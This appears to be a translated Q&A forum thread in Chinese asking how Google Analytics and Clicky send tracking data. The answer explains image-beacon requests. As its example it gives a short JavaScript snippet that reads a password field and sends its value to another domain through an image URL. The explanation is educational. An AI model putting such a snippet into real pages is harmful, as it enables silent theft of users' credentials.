4

有人知道 Google Analytics 或 Clicky 是如何工作的吗?

我被困在我搜索了整个http://static.getclicky.com/js文件但没有在其中找到任何服务器请求的事实。它如何在不影响自身安全的情况下发送数据?否则用户可以通过修改js发送虚假数据。

4

1 回答 1

5

图像:这些库使用一种技巧,将所需的所有跟踪信息编码,将其附加到图像 URL,并通过请求图像“发送”它。该图像文件名的服务器端解析会解码信息。

假设您有一个要从 mydomain.com 发送到 somedomain.com 的密码字段:

<input type='password' id='p' />

此 javascript 可以通过违反跨站点限制来发送内容:

var t = document.getElementById('p').value;
var i = document.createElement('img');
i.src = 'http://somedomain.com/imagescript.php?p=' + t;

跨站点脚本限制不适用于图像,并且当您在 JavaScript 中编写图像 URL 请求时,世界上没有浏览器或逻辑可以解释所有可能性。假设我们很幸运 GA 是合乎道德的并且不会妨碍表单字段。

于 2012-06-12T12:53:04.913 回答